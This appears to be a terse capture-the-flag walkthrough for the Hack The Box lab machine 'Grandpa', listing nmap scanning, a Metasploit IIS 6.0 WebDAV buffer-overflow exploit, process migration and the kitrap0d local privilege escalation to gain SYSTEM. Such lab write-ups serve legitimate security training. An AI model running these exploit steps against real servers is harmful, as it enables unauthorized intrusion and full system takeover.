Grandpa
HTB 9. Grandpa
- 1.
nmap -T4 -A -p- 10.10.10.14
shows 80 open with versionMicrosoft IIS httpd 6.0
(dated version) and poentially risky methods (TRACE
and `PUT) - 2.Go to
10.10.10.14
shows "Under Construction" page. - 3.Google
Microsoft IIS httpd 6.0 exploit
finds Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow and Rapid7. - 4.
searchsploit ScStoragePathFromUrl
shows python and ruby modules. - 5.Metasploituse exploit/windows/iis/iis_webdav_scstoragepathfromurlset rhost 10.10.10.14set lport 5555show targetsrunTry running again (4 times)
- 6.We are not system.
ps
to show processes. Pick a process that hasNT AUTHORITY\NETWORK SERVICE
withmigrate 1788
and success. - 7.Priv esc suggester:search suggesteruse 0optionsset session 1runResult: 9 options, go down list and try to see what works
- 8.start with
ms10_015_kitrap0d
andset lhost tun0
- 9.
getuid
isNT AUTHORITY\SYSTEM
.
Last modified 9mo ago